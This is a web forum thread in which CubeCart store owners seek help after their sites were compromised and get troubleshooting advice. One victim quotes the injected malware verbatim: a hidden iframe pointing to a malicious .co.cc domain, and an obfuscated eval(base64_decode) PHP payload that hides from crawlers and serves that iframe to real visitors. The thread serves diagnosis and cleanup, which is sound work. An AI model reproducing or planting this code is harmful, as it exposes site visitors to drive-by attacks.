Please help to solve this error

[Guest]

Since yesterday our web site is broken. All of a sudden it started giving this message................................

Warning: ini_set() [ref.outcontrol]: Cannot change zlib.output_compression - headers already sent in /home/content/c/i/t/citylifeusa/html/store/ini.inc.php on line 114

Warning: Cannot modify header information - headers already sent by (output started at /home/content/c/i/t/citylifeusa/html/store/index.php(1) : eval()'d code:37) in /home/content/c/i/t/citylifeusa/html/store/index_enc_ion.php on line 31

Warning: Cannot modify header information - headers already sent by (output started at /home/content/c/i/t/citylifeusa/html/store/index.php(1) : eval()'d code:37) in /home/content/c/i/t/citylifeusa/html/store/index_enc_ion.php on line 32

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/content/c/i/t/citylifeusa/html/store/index.php(1) : eval()'d code:37) in /home/content/c/i/t/citylifeusa/html/store/classes/session/cc_session.php on line 213

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/content/c/i/t/citylifeusa/html/store/index.php(1) : eval()'d code:37) in /home/content/c/i/t/citylifeusa/html/store/classes/session/cc_session.php on line 213

Warning: session_regenerate_id() [function.session-regenerate-id]: Cannot regenerate session id - headers already sent in /home/content/c/i/t/citylifeusa/html/store/classes/session/cc_session.php on line 214

Warning: Cannot modify header information - headers already sent by (output started at /home/content/c/i/t/citylifeusa/html/store/index.php(1) : eval()'d code:37) in /home/content/c/i/t/citylifeusa/html/store/classes/session/cc_session.php on line 234

I called the hosting company and they said contact cubecart for this. They can not do anything. Does anyone knows how to fix this? Please help.

[Robsta]

I called the hosting company and they said contact cubecart for this. They can not do anything. Does anyone knows how to fix this? Please help.

Have you contacted CubeCart support?

For a site to just have this start happening without any changes to your store code, it's either a hosting issue (they changed something) or your site files have been changed without your knowledge.

Check the file dates on your PHP files for anything recent to around the time this started happening. Look at the files referenced in the error first.

[Mike MacKechnie]

I have had the exact same problem since 18th February.

It appears to be a trojan, which in my case entered via an out-of-date version of Wordpress.

[Guest]

I still could not solve the problem. I am not very familiar with these security issues. Did you get it fixed? Please let me know. I'm having sleepless nights because of this issue. :(

[Guest]

I opened a ticket with cube cart support and they were not helpful at all. Instead they wrote me back saying, since this site is blacklisted by Google saying it has malware, they said get the malware issue fixed and then they'll see if there's anything to do with cube cart. I don't know why the web designer used cube cart for the shopping cart. I'm so frustrated with cube cart support.

I found a malicious code in the index file. As soon as i delete that the site comes back perfect and the shopping cart works too. But the next day or even after few hours later, the code generates again the in the index and the site get broken. I don't know where or how to find the root cause. thank you for the reply.

[bsmither]

Please look at the web access logs for your hosting space. Hopefully your hosting provider gives you access to these files. Those access log files will show the file being exploited to damage your site.

If you require personal assistance in helping you determine if you have access to your web access logs and what to look for in those logs, please send me a private message.

[Mike MacKechnie]

I have rebuilt my store from scratch on a different directory, and it is no longer infected. However, all my other subdomains are still infected, which makes me think that there is some rogue code somewhere on one or more of my sites which is regenerating the iframe whenever it is loaded. I have searched for the usual suspects (eval, base64_decode, gzinflate, gzuncompress) but there's got to be something else out there that is doing the damage.

I have also reported it to unmaskparasites.com as follows:

repeated hacks into all index.htm files;

insert of iframe "<iframe

src="http://bdfj45jfdkhkm.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAwcCAQMMAw=="

width="1" height="1"></iframe>" as first line after <body> tag

or for index.php instances:

<?php

eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoI

jY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG

9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGlmcmFtZSBzcmM9Imh0dHA6Ly9mZ2VkeXUzaHJlaHNoLmNvLmNjL1FRa0ZCZzBBQVEwTUJBMERFa2NKQlFZTkF3Y0NBUU1NQXc9PSIgd2lkdGg9IjEiIGhlaWdodD0iMSI+PC9pZnJhbWU+JzsNCn0='));

sites affected

http://www.wymeruk.co.uk/

http://www.wymeruk.co.uk/Store

http://mbtp.wymeruk.co.uk/

http://www.scruntlehawk.com/

http://autumn.wymeruk.co.uk/

http://www.removalsbedford.co.uk/

http://www.nicksimper.com/

I edit the files remotely to remove the iframe tags but within 24 hours

they are back, usually referencing a new domain name in their src=

statement.

I have changed all ftp passwords and upgraded wordpress where applicable.

All these sites are hosted on the same HostMonster account.

http://www.removalsbedford.co.uk/ was running an old version of Wordpress

prior to the attack.

[bsmither]

I have a very important question to ask: are your CubeCart installations v4 or v3?

[Guest]

My cubecart version is 4.3.8. I have the same attack as Mike explained. It happened on Feb 18th. The iframe is same also same

insert of iframe "<iframe

src="http://bdfj45jfdkhkm.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAwcCAQMMAw=="

But the malicious code was generating only inside the store folder index.php file. And it's also the same as Mikes

eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib...........

Last week every time I delete this code from the index page, the site came back to normal but the code regenerate after few hours.

But few days ago I put a security patch I found in the cube cart forum and now this code stopped generating in my index file. So the site looks okay.

But when I type www.citylifeusa.com in internet explorer, I can see tin the status bar the web site is redirecting through the hackers domain http://bdfj45jfdkhkm.co.cc..

what do you think I should do about this. I'm sure the problem is not solved even though i don't get that header error message anymore. Looks like the traffic is going through the above bad domain. So they have capture my domain name?

I have attached a copy of the malicious code that used to generate inside the index.php.

[bsmither]

You still have the iframe. It appears that the index file in your main site (as opposed to the store folder) has been damaged. I see the refresh to the /store/ folder, however, and a very quick glance through the store code as delivered to my browser shows no damage.

I believe they haven't captured your domain name.